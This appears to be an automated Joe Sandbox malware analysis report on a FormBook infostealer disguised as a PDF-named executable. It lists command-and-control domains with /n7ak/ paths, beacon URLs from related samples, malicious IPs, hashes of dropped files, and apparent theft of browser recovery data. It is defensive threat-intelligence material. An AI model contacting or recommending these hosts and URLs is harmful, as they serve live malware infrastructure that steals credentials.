          http://www.playdoapp.onlineexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 10%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.395boulderbrookdr.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drfalse
          • URL Reputation: safe
          unknown
          https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.thehandycrewcompany.com/n7ak/www.tripskorea.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.tripskorea.com/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.parkpeninsula.online/n7ak/www.395boulderbrookdr.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.taxuw.com/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://www.ancientshadowguilt.space/n7ak/www.maximsboutique.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.1690.bizReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.parkpeninsula.online/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.tuktukwines.comReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.tripskorea.comReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.gameofgem.comReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.supremeajock.bizReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.taxuw.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://sectigo.com/CPS0Specification and Quantity Pdf.exe, Specification and Quantity Pdf.exe.0.drfalse
          • URL Reputation: safe
          unknown
          http://www.sdnaqianchuan.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.goodstuff.tv/n7ak/www.thehandycrewcompany.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://crash-reports.mozilla.com/submit?id=rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsmexplorer.exe, 00000008.00000000.1317815671.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.goodstuff.tvReferer:explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000008.00000002.3754644999.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://powerpoint.office.comexplorer.exe, 00000008.00000000.1337456269.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3762420609.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.foreca.comexplorer.exe, 00000008.00000002.3754644999.00000000071A4000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.sdnaqianchuan.com/n7ak/explorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.gameofgem.comexplorer.exe, 00000008.00000003.2271381440.000000000C570000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2275760179.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081397650.000000000C571000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3764856362.000000000C574000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          203.161.60.191
          www.jam-nins.comMalaysia
          45899VNPT-AS-VNVNPTCorpVNtrue
          23.227.38.74
          shops.myshopify.comCanada
          13335CLOUDFLARENETUStrue
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1515401
          Start date and time:2024-09-22 17:24:08 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 10m 45s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:20
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:1
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Sample name:Specification and Quantity Pdf.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@17/11@12/2
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 71%
          • Number of executed functions: 64
          • Number of non-executed functions: 224
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          TimeTypeDescription
          11:25:09API Interceptor21x Sleep call for process: powershell.exe modified
          11:25:18API Interceptor5241125x Sleep call for process: explorer.exe modified
          12:31:25API Interceptor9010529x Sleep call for process: rundll32.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          203.161.60.1910001.exeGet hashmaliciousFormBookBrowse
          • www.gsolartech.com/kmge/
          Sales Contract Document.bat.exeGet hashmaliciousFormBookBrowse
          • www.notbokin.online/45er/?Eb=wE2C7xhMoBPbyVVxV0BL8UTP1qQsXiLsH8oX9T1ewB5bIsG+GE5//bwpxqIUxj7HmU5h&ohrPK2=Txo0d8
          23.227.38.74r8ykXfy52F9CXd5d.exeGet hashmaliciousFormBookBrowse
          • www.sdcollections.shop/he2a/?EhCdVX=K85VkNX2gzFTaVwdkebjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP4/YsxR0Bd308&Ir=X2JLBxZp
          0nazQxrt5MZ5BRK.exeGet hashmaliciousFormBookBrowse
          • www.sdcollections.shop/he2a/?RlXX=K85VkNX2gzFTaVwdkebjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP480K2QI5QWVnx/JXOA==&DvU8k=hbjlAVS0fTh
          ojtBIU0jhM.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • www.faredeal.online/v15n/?qN9=EFNxULM0Cf1t&jL0=ukmuyFp122ER9SkUd0Oy5jDnVATzXW6kTvhnBjXlJsYO+LS6EgGMB9Jvm3Bl806Q2DBF
          PDPUOIE76867 PDF.exeGet hashmaliciousFormBookBrowse
          • www.sdcollections.shop/he2a/?5jE=K85VkNWCgTAjHltp4ubjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP4/YJqgEBd3ox&ZN9Ls=9rCTo2P0wPzDj0p
          LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exeGet hashmaliciousFormBookBrowse
          • www.vanguardcoffee.shop/rn94/?D8v=8pGtVJo0up&Rfg=24QTUhZRstyZshAJnYZI2UxfXBs/uV+QALIDsDsnR/VZc8/4uu3qctyboRQgkU7gUCap
          Etisalat Summary Bill for the Month of August.exeGet hashmaliciousFormBookBrowse
          • www.melliccine.com/pt46/?BXIxB=FNzjLCNxKg4LnG2n+y3Cc1p/SDbqNFm/9WFnTrWlxnnrh9nJEYJm3P779kB2uMZreiO6&-ZYp=fvRlPd_pa8MLs2
          MAPAL AMENDED PI SO23000680.exeGet hashmaliciousFormBookBrowse
          • www.valerieomage.com/hsmv/
          Payment Advice - Ref[GLV407423235].scr.exeGet hashmaliciousFormBookBrowse
          • www.valerieomage.com/hsmv/
          New Inquiry GLES Inquiry G-6463_pdf.scr.exeGet hashmaliciousFormBookBrowse
          • www.valerieomage.com/hsmv/
          http://329e60-b9.myshopify.com/_t/c/A1020004-17EE30B00427829D-68C1B5C3/Get hashmaliciousUnknownBrowse
          • 329e60-b9.myshopify.com/favicon.ico
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          www.jam-nins.comPI_and_payment_confirmed_pdf.exeGet hashmaliciousFormBook, DBatLoaderBrowse
          • 203.161.55.145
          Nova_lista_narudzbi.exeGet hashmaliciousFormBook, DBatLoaderBrowse
          • 5.183.8.25
          Copie a bonului de plata.exeGet hashmaliciousFormBook, DBatLoaderBrowse
          • 5.183.8.25
          Racun je u prilogu.exeGet hashmaliciousDBatLoader FormBookBrowse
          • 162.0.216.198
          shops.myshopify.comr8ykXfy52F9CXd5d.exeGet hashmaliciousFormBookBrowse
          • 23.227.38.74
          t5ueYgHiHnIdeNe.exeGet hashmaliciousFormBookBrowse
          • 23.227.38.74
          http://chiao1129.github.io/loginGet hashmaliciousHTMLPhisherBrowse
          • 23.227.38.74
          http://vineethkinik.github.io/Netflix-wesite-frontendGet hashmaliciousHTMLPhisherBrowse
          • 23.227.38.74
          0nazQxrt5MZ5BRK.exeGet hashmaliciousFormBookBrowse
          • 23.227.38.74
          ojtBIU0jhM.exeGet hashmaliciousFormBook, PureLog StealerBrowse
          • 23.227.38.74
          PDPUOIE76867 PDF.exeGet hashmaliciousFormBookBrowse
          • 23.227.38.74
          LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exeGet hashmaliciousFormBookBrowse
          • 23.227.38.74
          Etisalat Summary Bill for the Month of August.exeGet hashmaliciousFormBookBrowse
          • 23.227.38.74
          DPPLYAD_12872 PDF.exeGet hashmaliciousFormBookBrowse
          • 23.227.38.74
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          VNPT-AS-VNVNPTCorpVNFYI.PDF.exeGet hashmaliciousFormBookBrowse
          • 203.161.43.245
          DHL Arrive Notice doc pdf.exeGet hashmaliciousFormBookBrowse
          • 203.161.55.124
          GyFcTadTZv.elfGet hashmaliciousMiraiBrowse
          • 14.245.235.176
          iZP1hJhnmz.elfGet hashmaliciousMiraiBrowse
          • 14.166.103.230
          dAlxfXyNm7.elfGet hashmaliciousMiraiBrowse
          • 14.249.33.83
          9B10a4bkpu.elfGet hashmaliciousMiraiBrowse
          • 14.231.22.130
          BJgQPShJE7.elfGet hashmaliciousMirai, MoobotBrowse
          • 113.170.251.18
          ZgBCG135hk.elfGet hashmaliciousMirai, MoobotBrowse
          • 14.226.229.8
          XPK8NKw7Jv.elfGet hashmaliciousMirai, MoobotBrowse
          • 14.229.190.177
          O9M84hUenb.elfGet hashmaliciousMirai, OkiruBrowse
          • 14.250.121.226
          CLOUDFLARENETUSADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
          • 104.21.64.108
          SecuriteInfo.com.BScope.TrojanPSW.Stealer.11760.26822.exeGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
          • 188.114.96.3
          SecuriteInfo.com.W64.Agent.IKW.gen.Eldorado.19678.19551.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
          • 104.21.4.91
          Docswift004994.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
          • 188.114.96.3
          P0 n.#U00b0 1037596.exeGet hashmaliciousAgentTeslaBrowse
          • 104.26.12.205
          QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
          • 188.114.96.3
          urgent inquiry.exeGet hashmaliciousAgentTeslaBrowse
          • 172.67.74.152
          DofusInvoker.swfGet hashmaliciousUnknownBrowse
          • 172.64.41.3
          pic2.jpg.exeGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
          • 172.67.191.81
          No context
          No context
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):64
          Entropy (8bit):1.1940658735648508
          Encrypted:false
          SSDEEP:3:NlllulJnp/p:NllU
          MD5:BC6DB77EB243BF62DC31267706650173
          SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
          SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
          SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:@...e.................................X..............@..........
          Process:C:\Windows\SysWOW64\cmd.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
          Category:modified
          Size (bytes):40960
          Entropy (8bit):0.8553638852307782
          Encrypted:false
          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
          MD5:28222628A3465C5F0D4B28F70F97F482
          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\SysWOW64\rundll32.exe
          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
          Category:dropped
          Size (bytes):74860
          Entropy (8bit):7.816299100841257
          Encrypted:false
          SSDEEP:1536:Cj53V290bbegk8E9AOB9bCK4NHjTmPJALBRF5HduZB9VR9A:w5F290byz8E9xCKgnmPJ2BRVuZXD9A
          MD5:286E56B78D6090A3D50782AED29123C2
          SHA1:9EBEC4137F9183AC1C85B82A726908D94201F00E
          SHA-256:10CF66030D61D75C044CF0B0FF89E64B44C351C514146F7CF8CA9350BCC43EAA
          SHA-512:15478E1DB156CBD508E3728B01195D4C0E00ED75ADD3A7893EE39D73F1665B2B6B33A4584F08CC7CD0DA3C2E799117986A8847BBD9EF03CFECF3FD3B1B83036A
          Malicious:false
          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-v.....Z..tN.Lo..?.Xb1....Oc....&...W.8.+.?.]._.....G.R....n..............z...........w..#.......`..
          Process:C:\Windows\SysWOW64\rundll32.exe
          File Type:Targa image data - RGB - RLE 109 x 101 x 32 +114 +111 "R"
          Category:dropped
          Size (bytes):38
          Entropy (8bit):2.7883088224543333
          Encrypted:false
          SSDEEP:3:rFGQJhIl:RGQPY
          MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
          SHA1:1E332822167C6F351B99615EADA2C30A538FF037
          SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
          SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
          Malicious:false
          Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
          Process:C:\Windows\SysWOW64\rundll32.exe
          File Type:data
          Category:dropped
          Size (bytes):40
          Entropy (8bit):2.8420918598895937
          Encrypted:false
          SSDEEP:3:+slXllAGQJhIl:dlIGQPY
          MD5:D63A82E5D81E02E399090AF26DB0B9CB
          SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
          SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
          SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
          Malicious:true
          Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
          Process:C:\Windows\SysWOW64\rundll32.exe
          File Type:data
          Category:dropped
          Size (bytes):40
          Entropy (8bit):2.96096404744368
          Encrypted:false
          SSDEEP:3:AJlbeGQJhIl:tGQPY
          MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
          SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
          SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
          SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
          Malicious:true
